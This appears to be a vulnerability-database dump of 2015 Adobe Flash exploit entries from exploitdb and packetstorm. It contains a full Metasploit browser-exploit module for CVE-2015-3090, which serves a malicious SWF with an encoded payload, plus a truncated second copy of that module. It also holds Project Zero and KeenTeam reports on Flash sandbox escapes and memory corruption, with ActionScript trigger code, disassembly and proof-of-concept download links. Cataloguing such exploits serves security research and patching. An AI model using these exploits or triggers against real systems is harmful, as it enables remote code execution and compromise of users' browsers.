17.0.0.169.\r\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Chris Evans', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3090'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],\r\n ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37368/"}, {"lastseen": "2016-02-04T06:40:58", "osvdbidlist": ["121932"], "references": [], "edition": 1, "description": "Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash. CVE-2015-3082. Remote exploit for windows platform", "reporter": "KeenTeam", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3082"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37840", "href": "https://www.exploit-db.com/exploits/37840/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nFlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape\r\n\r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n\r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n\r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers \"\\\" as delimiter. If the destination includes \"/\", FlashBroker will use a wrong destination folder for check.\r\n\r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n\r\n2. Credit\r\nJietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip\r\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37840/"}, {"lastseen": "2016-02-04T06:41:29", "osvdbidlist": ["121938"], "references": [], "edition": 1, "description": "Flash AVSS.setSubscribedTags Use After Free Memory Corruption. CVE-2015-3088. Dos exploit for windows platform", "reporter": "Google Security Research", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "exploitdb", "title": "Flash AVSS.setSubscribedTags Use After Free Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3088"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37844", "href": "https://www.exploit-db.com/exploits/37844/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864]\r\n\r\nVULNERABILITY DETAILS\r\nUse After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations.\r\n\r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\nUse After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution.\r\npepflashplayer.dll 17.0.0.134, based at 0x10000000.\r\n\r\nThe setSubscribedTags is handled by sub_103255AD:\r\n\r\n.text:103255AD push ebp\r\n.text:103255AE mov ebp, esp\r\n.text:103255B0 and esp, 0FFFFFFF8h\r\n.text:103255B3 sub esp, 14h\r\n.text:103255B6 push ebx\r\n.text:103255B7 mov ebx, [ebp+arg_0]\r\n.text:103255BA push esi\r\n.text:103255BB push edi\r\n.text:103255BC mov edi, eax\r\n.text:103255BE mov eax, [ebx]\r\n.text:103255C0 mov ecx, ebx\r\n.text:103255C2 call dword ptr [eax+8Ch] ; first get the length of the provided array\r\n.text:103255C8 lea esi, [edi+4Ch]\r\n.text:103255CB mov [esp+20h+var_C], eax\r\n.text:103255CF call sub_103265BB\r\n.text:103255D4 mov esi, [esp+20h+var_C]\r\n.text:103255D8 test esi, esi\r\n.text:103255DA jz loc_1032566D\r\n.text:103255E0 xor ecx, ecx\r\n.text:103255E2 push 4\r\n.text:103255E4 pop edx\r\n.text:103255E5 mov eax, esi\r\n.text:103255E7 mul edx\r\n.text:103255E9 seto cl\r\n.text:103255EC mov [edi+58h], esi\r\n.text:103255EF neg ecx\r\n.text:103255F1 or ecx, eax\r\n.text:103255F3 push ecx\r\n.text:103255F4 call unknown_libname_129 ; and then allocate an array of 4*length\r\n.text:103255F9 and [esp+24h+var_10], 0\r\n.text:103255FE pop ecx\r\n.text:103255FF mov [edi+54h], eax ; that pointer is put at offset 0x54 in the object pointed by edi\r\n\r\n\r\nNext there is a for loop that iterates over the array items and calls the toString() method of each item encountered:\r\n\r\n.text:10325606 loc_10325606:\r\n.text:10325606 mov eax, [edi+8]\r\n.text:10325609 mov eax, [eax+14h]\r\n.text:1032560C mov esi, [eax+4]\r\n.text:1032560F push [esp+20h+var_10]\r\n.text:10325613 mov eax, [ebx]\r\n.text:10325615 mov ecx, ebx\r\n.text:10325617 call dword ptr [eax+3Ch] ; get the ith element\r\n.text:1032561A push eax\r\n.text:1032561B mov ecx, esi\r\n.text:1032561D call sub_1007205D ; call element->toString()\r\n.text:10325622 lea ecx, [esp+20h+var_8]\r\n.text:10325626 push ecx\r\n.text:10325627 call sub_10061703\r\n.text:1032562C mov eax, [esp+20h+var_4]\r\n.text:10325630 inc eax\r\n.text:10325631 push eax\r\n.text:10325632 call unknown_libname_129\r\n.text:10325637 mov edx, [edi+54h]\r\n.text:1032563A pop ecx\r\n.text:1032563B mov ecx, [esp+20h+var_10]\r\n.text:1032563F mov [edx+ecx*4], eax ; write a pointer to the string in the array\r\n...\r\n.text:1032565F inc [esp+20h+var_10]\r\n.text:10325663 mov eax, [esp+20h+var_10]\r\n.text:10325667 cmp eax, [esp+20h+var_C]\r\n.text:1032566B jl short loc_10325606\r\n\r\n\r\nThe issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory.\r\n\r\nTrigger with that:\r\n\r\n var avss:flash.media.AVSegmentedSource = new flash.media.AVSegmentedSource ();\r\n \r\n var o:Object = new Object();\r\n o.toString = function():String {\r\n var a = [0,1,2,3];\r\n avss.setSubscribedTags(a);\r\n return \"ahahahahah\"\r\n };\r\n \r\n var a = [o,1,2,3,4,5,6,7,8,9];\r\n var i:uint = 0;\r\n while (i < 0x100000) {\r\n i++;\r\n a.push(i);\r\n }\r\n avss.setSubscribedTags(a);\r\n\r\nNote: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf.\r\n \r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as.\r\n\r\nMy mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37844/"}, {"lastseen": "2016-02-04T06:41:05", "osvdbidlist": ["121933"], "references": [], "edition": 1, "description": "Flash Broker-Based Sandbox Escape via Unexpected Directory Lock. CVE-2015-3083. Remote exploit for windows platform", "reporter": "KeenTeam", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Flash Broker-Based Sandbox Escape via Unexpected Directory Lock", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3083"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37841", "href": "https://www.exploit-db.com/exploits/37841/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nFlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape\r\n\r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n\r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n\r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other.\r\n\r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n\r\n2. Credit\r\nJietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n\r\nProof of Concept:\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip\r\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37841/"}, {"lastseen": "2016-02-04T06:42:42", "osvdbidlist": [], "references": [], "edition": 1, "description": "Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap. CVE-2015-3080. Dos exploit for windows platform", "reporter": "Google Security Research", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3080"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37853", "href": "https://www.exploit-db.com/exploits/37853/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=358&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=457680]\r\n\r\n---\r\nVULNERABILITY DETAILS\r\nThere is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. \r\n\r\nVERSION\r\nChrome Version: 40.0.2214.111 stable, Flash 16.0.0.305\r\nOperating System: Win7 SP1 x64]\r\n\r\nThe AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).\r\nJust put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344.\r\n\r\n\r\nHere are a few steps to trigger the issue:\r\n\r\n1) Create a BitmapData and store it somewhere, for example as a static member of a custom class.\r\n2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter.\r\n3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns.\r\n4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property.\r\n5) Use the first BitmapData and call getPixel32(o).\r\n\r\nWhat happens during step 5? Flash caches first the BitmapData in the stack before calling o.valueOf. At that moment the BitmapData isn't used elsewhere so its refcount equals 1. Flash enters then o.valueOf which leads to get the mapBitmap property. At that moment we hit the following lines, in sub_10193F2D:\r\n\r\nCPU Disasm\r\nAddress Hex dump Command \r\n6D2D3FBB 68 BE27C66D PUSH OFFSET 6DC627BE\r\n6D2D3FC0 FF73 04 PUSH DWORD PTR DS:[EBX+4]\r\n6D2D3FC3 56 PUSH ESI\r\n6D2D3FC4 8B33 MOV ESI,DWORD PTR DS:[EBX]\r\n6D2D3FC6 E8 A572F8FF CALL 6D25B270 ; that function creates a new atom and calls the BitmapData constructor\r\n6D2D3FCB 84C0 TEST AL,AL\r\n6D2D3FCD 74 09 JE SHORT 6D2D3FD8\r\n6D2D3FCF 8B0B MOV ECX,DWORD PTR DS:[EBX]\r\n6D2D3FD1 6A 01 PUSH 1 \r\n6D2D3FD3 E8 281A0100 CALL 6D2E5A00 ; if the constructor is overriden by a custom class, the custom constructor is called here\r\n6D2D3FD8 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]\r\n6D2D3FDB 8B13 MOV EDX,DWORD PTR DS:[EBX]\r\n6D2D3FDD 56 PUSH ESI\r\n6D2D3FDE E8 418EF6FF CALL 6D23CE24 ; then pop the new atom from the AS2 stack\r\n...\r\n6D2D4000 23F8 AND EDI,EAX\r\n6D2D4002 807F 35 1B CMP BYTE PTR DS:[EDI+35],1B ; and ensure this is indeed a BitmapData\r\n6D2D4006 74 0A JE SHORT 6D2D4012\r\n...\r\n\r\nIn the next lines Flash does two things. It destroys the BitmapData object associated to the BitmapData atom and replaces it with the one defined in the DisplacementMapFilter:\r\n\r\n6D2D4012 8B47 28 MOV EAX,DWORD PTR DS:[EDI+28]\r\n6D2D4015 83E0 FE AND EAX,FFFFFFFE\r\n6D2D4018 8B40 18 MOV EAX,DWORD PTR DS:[EAX+18] ; get the BitmapData object \r\n6D2D401B 33C9 XOR ECX,ECX\r\n6D2D401D 51 PUSH ECX\r\n6D2D401E E8 1DB2FEFF CALL 6D2BF240 ; call the BitmapData destructor\r\n6D2D4023 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10]\r\n6D2D4026 8BC7 MOV EAX,EDI\r\n6D2D4028 E8 134AF6FF CALL 6D238A40 ; and associate the DisplacementMapFilter.mapBitmap object\r\n\r\n\r\nAll of this works as long as the BitmapData object read from the AS2 stack is not in use somewhere. But since we can provide our own constructor, we can do anything with the AS2 stack, including having an in use BitmapData at the top of the stack when the constructor returns. This can be done by manipulating the AS2 byte code of the constructor for example. So if the returned BitmapData has a refcounter set to 1, Flash frees the object and we end up with a garbage reference in the stack which crashes the player in BitmapData.getPixel32.\r\n\r\nAfter compiling mapBitmap_as2.swf, I had to change the bytes at offset 0x90F in the (MyBitmapData constructor):\r\n52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)\r\n\r\nHopefully if it works we should crash here with eax controlled:\r\nCPU Disasm\r\nAddress Hex dump Command\r\n6D2BFA83 3B58 0C CMP EBX,DWORD PTR DS:[EAX+0C] //eax = 0x41424344\r\n6D2BFA86 7D 57 JGE SHORT 6D2BFADF\r\n6D2BFA88 85FF TEST EDI,EDI\r\n6D2BFA8A 78 53 JS SHORT 6D2BFADF\r\n6D2BFA8C 3B78 08 CMP EDI,DWORD PTR DS:[EAX+8]\r\n6D2BFA8F 7D 4E JGE SHORT 6D2BFADF\r\n6D2BFA91 8BC8 MOV ECX,EAX\r\n6D2BFA93 8B01 MOV EAX,DWORD PTR DS:[ECX]\r\n6D2BFA95 8B50 10 MOV EDX,DWORD PTR DS:[EAX+10]\r\n6D2BFA98 FFD2 CALL EDX\r\n\r\nI don't kwow if we can abuse ASLR with that. If we can do something without getting a virtual function dereferenced, it must be possible.\r\n\r\n\r\n***************************************************************************\r\nContent of MyBitmapData.as\r\n\r\nclass MyBitmapData extends String\r\n{\r\n\tstatic var mf;\r\n\tfunction MyBitmapData()\r\n\t{\r\n\t\tsuper();\r\n var a = MyBitmapData.mf\r\n test(a,a,a,a,a,a,a,a) //that part should be deleted manually in the bytecode\r\n trace(a) //so that MyBitmapData.mf stays on top of the AS2 stack\r\n\t}\r\n\tpublic function test(a,b,c,d,e,f,g,h) {\r\n \r\n }\r\n\tstatic function setBitmapData(myfilter)\r\n\t{\r\n\t\tmf = myfilter;\r\n\t}\r\n}\r\n\r\n***************************************************************************\r\nContent of mapBitmap_as2.fla\r\n\r\nimport flash.filters.DisplacementMapFilter;\r\nimport flash.display.BitmapData;\r\n\r\nvar bd:BitmapData = new BitmapData(10,10)\r\nMyBitmapData.setBitmapData(bd)\r\nvar bd2:BitmapData = new BitmapData(10,10)\r\nvar dmf:DisplacementMapFilter = new DisplacementMapFilter(bd2,new flash.geom.Point(1,2),1,2,3,4)\r\n\r\nnewConstr = MyBitmapData\r\nflash.display.BitmapData = newConstr\r\n\r\nfunction f() {\r\n\tvar a = dmf.mapBitmap;\r\n}\r\nvar a:Array = new Array()\r\nvar b:Array = new Array()\r\nfor (var i = 0; i<0xC8/4;i++) {\r\n\tb[i] = 0x41424344\r\n}\r\n\r\nvar o = new Object()\r\no.valueOf = function () {\r\n\tf()\r\n\tfor (var i = 0; i<0x10;i++) {\r\n\t\tvar tf:TextFormat = new TextFormat()\r\n\t\ttf.tabStops = b\r\n\t\ta[i] = tf\r\n\t}\r\n\treturn 4\r\n}\r\n\r\nbd.getPixel32(o,4)\r\n---\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37853.zip\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37853/"}, {"lastseen": "2016-02-04T06:41:12", "osvdbidlist": ["121931"], "references": [], "edition": 1, "description": "Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving. CVE-2015-3081. Remote exploit for windows platform", "reporter": "KeenTeam", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3081"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37842", "href": "https://www.exploit-db.com/exploits/37842/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=280&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nFlashBroker - BrokerMoveFileEx TOCTOU IE PM Sandbox Escape\r\n\r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n\r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n\r\nThere is a race condition in FlashBroker BrokerMoveFileEx method. This race can be won by using an oplock to wait for the point where the BrokerMoveFileEx method opens the original file and then making destination to be a junction.\r\n\r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n\r\n2. Credit\r\nJihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37842.zip", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37842/"}, {"lastseen": "2016-02-04T06:41:37", "osvdbidlist": ["121939"], "references": [], "edition": 1, "description": "Flash Uninitialized Stack Variable MPD Parsing Memory Corruption. CVE-2015-3089. Dos exploit for windows platform", "reporter": "bilou", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Flash Uninitialized Stack Variable MPD Parsing Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3089"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37845", "href": "https://www.exploit-db.com/exploits/37845/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201]\r\n\r\nCredit is to bilou, working with the Chromium Vulnerability Rewards Program.\r\n\r\n---\r\nVULNERABILITY DETAILS\r\nLoading a weird MPD file can corrupt flash player's memory.\r\n\r\nVERSION\r\nChrome version 41.0.2272.101, Flash 17.0.0.134\r\nOperating System: Win 7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\nI'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D.\r\n\r\n\"To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:\"\r\n\r\n\"http://localhost/PlayManifest.swf?file=gen.mpd\r\n\r\n\"To compile the .as file, I had to use special flags to flex:\"\r\n\r\n\"mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as\"\r\n\"(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)\"\r\n\r\n\r\nOn Win7 x64 sp1 with Chrome 32 bit, crash like this:\r\n6AA8B67C | 8B C3 | mov eax,ebx |\r\n6AA8B67E | E8 A1 05 00 00 | call pepflashplayer.6AA8BC24 |\r\n6AA8B683 | EB A8 | jmp pepflashplayer.6AA8B62D |\r\n6AA8B685 | 89 88 D0 00 00 00 | mov dword ptr ds:[eax+D0],ecx | // crash here, eax points somewhere in pepflashplayer.dll\r\n6AA8B68B | 8B 88 88 00 00 00 | mov ecx,dword ptr ds:[eax+88] |\r\n6AA8B691 | 33 D2 | xor edx,edx |\r\n6AA8B693 | 3B CA | cmp ecx,edx |\r\n6AA8B695 | 74 07 | je pepflashplayer.6AA8B69E |\r\n6AA8B697 | 39 11 | cmp dword ptr ds:[ecx],edx |\r\n6AA8B699 | 0F 95 C1 | setne cl |\r\n\r\n\r\nAt first sight this looks to be an uninitialized stack variable but I might be wrong.\r\n---\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37845/"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:47", "references": [], "edition": 1, "description": "", "reporter": "Chris Evans", "published": "2015-06-19T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player ShaderJob Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "modified": "2015-06-19T00:00:00", "href": "https://packetstormsecurity.com/files/132383/Adobe-Flash-Player-ShaderJob-Buffer-Overflow.html", "id": "PACKETSTORM:132383", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability related to the ShaderJob workings on \nAdobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the \nsame Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute \nof the ShaderJob after starting the job it's possible to create a buffer overflow condition \nwhere the size of the destination buffer and the length of the copy are controlled. This \nmodule has been tested successfully on: \n* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169. \n* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169. \n* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169. \n* Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Chris Evans', # Vulnerability discovery \n'Unknown', # Exploit in the wild \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-3090'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'], \n['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'], \n['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['win', 'linux'], \n'Arch' => [ARCH_X86], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:arch => ARCH_X86, \n:os_name => lambda do |os| \nos =~ OperatingSystems::Match::LINUX || \nos =~ OperatingSystems::Match::WINDOWS_7 || \nos =~ OperatingSystems::Match::WINDOWS_81 \nend, \n:ua_name => lambda do |ua| \ncase target.name \nwhen 'Windows' \nreturn true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF \nwhen 'Linux' \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \n:flash => lambda do |ver| \ncase target.name \nwhen 'Windows' \nreturn true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169') \nwhen 'Linux' \nreturn true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => 'win' \n} \n], \n[ 'Linux', \n{ \n'Platform' => 'linux' \n} 